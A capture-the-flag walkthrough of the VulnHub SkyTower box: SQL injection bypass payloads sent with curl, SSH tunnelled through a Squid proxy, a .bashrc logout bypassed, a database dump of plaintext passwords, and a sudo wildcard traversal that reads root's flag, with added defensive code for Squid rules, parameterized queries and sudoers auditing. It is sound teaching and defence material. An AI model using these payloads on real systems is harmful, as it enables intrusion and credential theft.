tags: skytower

SkyTower: 1

SkyTower is a boot2root challenge hosted at VulnHub. The goal is to reach /root/flag.txt.

Nmap

[email protected]:~# nmap -n -sV -A -p- 192.168.127.128

PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: ERROR: The requested URL could not be retrieved

SkyTower Login

I punched the IP into Iceweasel and was greeted with a login screen.

The post data of login.php looks like email=&password=. Instead of using the browser, I elected to attempt some injection with cURL. First, a simple test with username and password as x.

[email protected]:~# curl http://192.168.127.128/login.php --data "email=x&password=x"
<br>Login Failed</br>

After inserting an apostrophe into the email field, I received this error:

[email protected]:~# curl http://192.168.127.128/login.php --data "email='&password="
There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and password=''' at line 1]

I tried various authentication bypass injections:

[email protected]:~# curl http://192.168.127.128/login.php --data "email='&password=' or '1'='1"
There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''1'' at line 1]

This is a rather curious error message: it appears as though ‘or’ has been filtered out of my request. I spent a bunch of time looking at SQLi filter evasion and possible wildcard inclusion. I finally found that the following injection worked:

[email protected]:~# curl http://192.168.127.128/login.php --data "email='*'&password='*'"

For clarity, the result of that injection is screenshot below.

$2 retirement fund… a bit stingy to say the least…

Secure Shell

This message is very useful, in that it flat out tells us to SSH into the box and even provides a username and password. However, if we recall the Nmap scan, port 22 was filtered, but a Squid proxy is running on 3128. I used proxytunnel to establish a connection to port 22 through the proxy.

[email protected]:~# proxytunnel -p 192.168.127.128:3128 -d 127.0.0.1:22 -a 2222
[email protected]:~# ssh john@127.0.0.1 -p 2222
john@127.0.0.1's password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
 
Funds have been withdrawn
Connection to 127.0.0.1 closed.
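The reason proxytunnel works here is that the Squid instance answers CONNECT requests for port 22, which Squid's stock configuration refuses with `http_access deny CONNECT !SSL_ports`. The following is an added example, not the writeup's code and not the box's real squid.conf (which the writeup never shows): it models Squid's http_access evaluation for `port`, `method` and the built-in `all` ACL only, and checks two constructed configuration fragments, one that lets CONNECT reach any port and one with the stock ordering that restricts tunnels to 443.

```python
# Constructed squid.conf fragments. Squid evaluates http_access lines top to
# bottom; every ACL on a line must match, the first matching line decides, and
# if no line matches the default is the opposite of the last line.
WEAK_CONF = """
acl SSL_ports port 443
acl Safe_ports port 80 443
acl CONNECT method CONNECT
http_access allow all
http_access deny CONNECT !SSL_ports
"""

# Same ACLs, but the deny lines come first, as in Squid's shipped squid.conf.
HARDENED_CONF = """
acl SSL_ports port 443
acl Safe_ports port 80 443
acl CONNECT method CONNECT
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow all
"""


def parse_squid_conf(text):
    """Collect acl definitions and http_access rules; only a subset of the format."""
    acls = {"all": ("all", [])}  # predefined in modern Squid; older configs declare it
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        words = line.split()
        if words[0] == "acl" and len(words) >= 4:
            name, acl_type, values = words[1], words[2], words[3:]
            acls.setdefault(name, (acl_type, []))[1].extend(values)
        elif words[0] == "http_access" and len(words) >= 2:
            rules.append((words[1], words[2:]))
    return acls, rules


def port_matches(values, port):
    """Port ACL values are single ports or lo-hi ranges such as 1025-65535."""
    for value in values:
        lo, _, hi = value.partition("-")
        if hi:
            if int(lo) <= port <= int(hi):
                return True
        elif int(lo) == port:
            return True
    return False


def acl_hit(acls, term, method, port):
    """Evaluate one ACL reference, honouring a leading '!' negation."""
    negated = term.startswith("!")
    acl_type, values = acls[term.lstrip("!")]
    if acl_type == "all":
        hit = True
    elif acl_type == "method":
        hit = method.upper() in [v.upper() for v in values]
    elif acl_type == "port":
        hit = port_matches(values, port)
    else:
        raise ValueError(f"acl type {acl_type!r} is not modelled in this example")
    return hit != negated


def request_allowed(conf_text, method, port):
    """Apply the http_access rules to a request described by method and target port."""
    acls, rules = parse_squid_conf(conf_text)
    for action, terms in rules:
        if all(acl_hit(acls, term, method, port) for term in terms):
            return action == "allow"
    if not rules:
        return False
    return rules[-1][0] == "deny"  # no match: opposite of the last line's action


def connect_allowed(conf_text, port):
    """Can a client open a CONNECT tunnel to this port, as proxytunnel does?"""
    return request_allowed(conf_text, "CONNECT", port)


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: CONNECT to 22 allowed = {connect_allowed(conf, 22)}")
```

Reordering is the whole fix: with the deny lines first, a CONNECT to 22 is rejected by `deny !Safe_ports` before the `allow` is ever consulted, while ordinary GETs to port 80 and tunnels to 443 still pass.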

So I was able to log in, but was instantly kicked. There were several ways to get around this. The first is to modify the user's .bashrc file:

[email protected]:~# ssh john@127.0.0.1 -p 2222 "cat /home/john/.bashrc"

echo
echo  "Funds have been withdrawn"
exit
[email protected]:~# ssh john@127.0.0.1 -p 2222 "sed -i '/exit/s/^/#/' /home/john/.bashrc"

The second is simply to pass another instance of sh or bash as the remote command.

[email protected]:~# ssh john@127.0.0.1 -p 2222 "/bin/bash"

In any case, I now have a shell. John doesn't have sudo rights, but he does have permission to read login.php, which contains the database credentials.

[email protected]:~$ cat /var/www/login.php 
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');

It’s also interesting to see the SQLi filtering which was going on: a case-insensitive blacklist of keywords that are simply stripped from the input. This also explains why the '*' payload got through: it contains none of the blacklisted strings, and MySQL evaluates the resulting email=''*'' as email=0, which holds for every row because the addresses convert to 0 when compared numerically.

$sqlinjection = array("SELECT", "TRUE", "FALSE", "--","OR", "=", ",", "AND", "NOT");
$email = str_ireplace($sqlinjection, "", $_POST['email']);
$password = str_ireplace($sqlinjection, "", $_POST['password']);
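To show why a keyword blacklist is the wrong control, here is an added example (not the writeup's code, and not login.php) that reproduces the str_ireplace filter in Python, renders the statement as it would reach MySQL, and then does the lookup the way it should be done, with a bound parameter query. The table rows are the ones from the writeup's later dump, loaded into an in-memory SQLite database as constructed test data; the exact shape of login.php's SELECT is an assumption, since the writeup only shows the "and password=" fragment of it.

```python
import sqlite3

# The blacklist that login.php applies with str_ireplace.
SQLINJECTION = ["SELECT", "TRUE", "FALSE", "--", "OR", "=", ",", "AND", "NOT"]


def str_ireplace(needles, haystack):
    """Mimic PHP str_ireplace($needles, "", $haystack): each needle is removed
    case-insensitively, in array order, everywhere it occurs."""
    out = haystack
    for needle in needles:
        lowered, target = out.lower(), needle.lower()
        pieces, i = [], 0
        while True:
            j = lowered.find(target, i)
            if j == -1:
                pieces.append(out[i:])
                break
            pieces.append(out[i:j])
            i = j + len(target)
        out = "".join(pieces)
    return out


def blacklist_filter(value):
    """What login.php does to $_POST['email'] and $_POST['password']."""
    return str_ireplace(SQLINJECTION, value)


def render_query(email, password):
    """Assumed shape of login.php's statement after the blacklist has run.
    Filtered text is still spliced straight into SQL, so anything the list
    does not name (quotes, '*', parentheses) keeps its SQL meaning."""
    e, p = blacklist_filter(email), blacklist_filter(password)
    return f"select * from login where email='{e}' and password='{p}'"


# Rows from the writeup's dump of the login table (constructed test data).
LOGIN_ROWS = [
    (1, "john@skytech.com", "hereisjohn"),
    (2, "sara@skytech.com", "ihatethisjob"),
    (3, "william@skytech.com", "senseable"),
]


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    db.executemany("INSERT INTO login VALUES (?, ?, ?)", LOGIN_ROWS)
    return db


def login_parameterized(email, password, db=None):
    """The fix: bind the inputs as parameters. The driver sends them as data,
    so they can never change the shape of the statement and no blacklist is
    needed. (The table also keeps passwords in clear text; a real application
    would store and compare a salted hash instead.)"""
    db = db or build_db()
    row = db.execute(
        "SELECT id FROM login WHERE email = ? AND password = ?", (email, password)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    print(blacklist_filter("password"))   # legitimate input is mangled
    print(render_query("'*'", "'*'"))     # the payload passes through untouched
    print(login_parameterized("'*'", "'*'"))
```

Two things stand out: the filter silently damages honest input (any password containing "or" or "and" loses those letters, so those users can never log in), while the payload that actually worked survives untouched. With the parameterized version the same payload is just a string that matches no row.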

MySQL

With these credentials, I was able to log into MySQL, explore the SkyTech database and extract the plaintext passwords of two other users.

[email protected]:~$ mysql -uroot -proot
 
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| SkyTech            |
| mysql              |
| performance_schema |
+--------------------+
 
mysql> use SkyTech
 
mysql> show tables;
+-------------------+
| Tables_in_SkyTech |
+-------------------+
| login             |
+-------------------+
 
mysql> select * from login;
+----+----------------------+--------------+
| id | email                | password     |
+----+----------------------+--------------+
|  1 | john@skytech.com     | hereisjohn   |
|  2 | sara@skytech.com     | ihatethisjob |
|  3 | william@skytech.com  | senseable    |
+----+----------------------+--------------+

I SSH’d in as Sara (after fixing the .bashrc file as before) and found that she has some sudo rights.

[email protected]:~$ sudo -l
 
User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

The wildcards in these sudo rules are vulnerable to a directory traversal effect: sudo matches the argument against /accounts/* as a glob, and /accounts/../root/flag.txt satisfies it, so the rule effectively grants root-level cat and ls on any path.

Root

[email protected]:~$ sudo /bin/ls /accounts/../root/
flag.txt
 
[email protected]:~$ sudo /bin/cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
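The sudoers wildcard above is the kind of rule an audit should catch before anyone needs the flag to prove it. The following is an added example, not part of the writeup: it models how sudo matches command-line arguments (shell-style globbing in which `*` also matches `/`, per sudoers(5)), resolves the requested path the way the kernel will, and reports every request that sudo would permit but that leaves the directory the administrator meant to expose. It also shows the containment check a root-owned wrapper script would apply in place of a glob. Paths are resolved lexically with normpath so the example runs without touching the filesystem; a real wrapper should use os.path.realpath so symlinks are resolved as well.

```python
import fnmatch
import posixpath

# The rules from the writeup: (root) NOPASSWD: /bin/cat /accounts/*, /bin/ls /accounts/*
SUDO_RULES = [
    ("/bin/cat", "/accounts/*"),
    ("/bin/ls", "/accounts/*"),
]
INTENDED_DIR = "/accounts"  # what the administrator meant to expose


def sudo_arg_matches(pattern, argument):
    """sudoers matches arguments with shell wildcards, and in arguments '*'
    also matches '/'. fnmatchcase has exactly that behaviour."""
    return fnmatch.fnmatchcase(argument, pattern)


def resolved(argument):
    """Collapse '.' and '..' lexically, as the kernel will when cat or ls
    opens the path. Use os.path.realpath in a real wrapper (symlinks)."""
    return posixpath.normpath(argument)


def escapes_directory(allowed_dir, argument):
    """True when the resolved path lies outside allowed_dir."""
    target = resolved(argument)
    base = posixpath.normpath(allowed_dir)
    return not (target == base or target.startswith(base + "/"))


def audit(rules, allowed_dir, requested_args):
    """Return (command, argument, resolved target) for every request sudo
    would permit whose real target is outside allowed_dir."""
    findings = []
    for command, pattern in rules:
        for arg in requested_args:
            if sudo_arg_matches(pattern, arg) and escapes_directory(allowed_dir, arg):
                findings.append((command, arg, resolved(arg)))
    return findings


def contained_path(allowed_dir, argument):
    """The check a root-owned wrapper should perform instead of relying on a
    glob: hand back the resolved path only when it stays inside allowed_dir."""
    if escapes_directory(allowed_dir, argument):
        return None
    return resolved(argument)


if __name__ == "__main__":
    requests = ["/accounts/sara/notes.txt", "/accounts/../root/flag.txt", "/root/flag.txt"]
    for finding in audit(SUDO_RULES, INTENDED_DIR, requests):
        print("wildcard escape:", finding)
```

The audit flags only the traversal request: /root/flag.txt on its own fails the glob, and /accounts/sara/notes.txt stays inside the directory. The remediation is to list a fixed wrapper in sudoers, with no wildcard in its arguments, and let the wrapper apply `contained_path` before it reads or lists anything.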

Even though I had root access, I wanted to explore William’s account. The password within the SkyTech database was incorrect for the user, so I cracked the real password by obtaining the shadow file. William’s real password is sensable, not senseable - not sure if this is a typo in the database or intentional. Either way, I didn’t find anything interesting within his user space.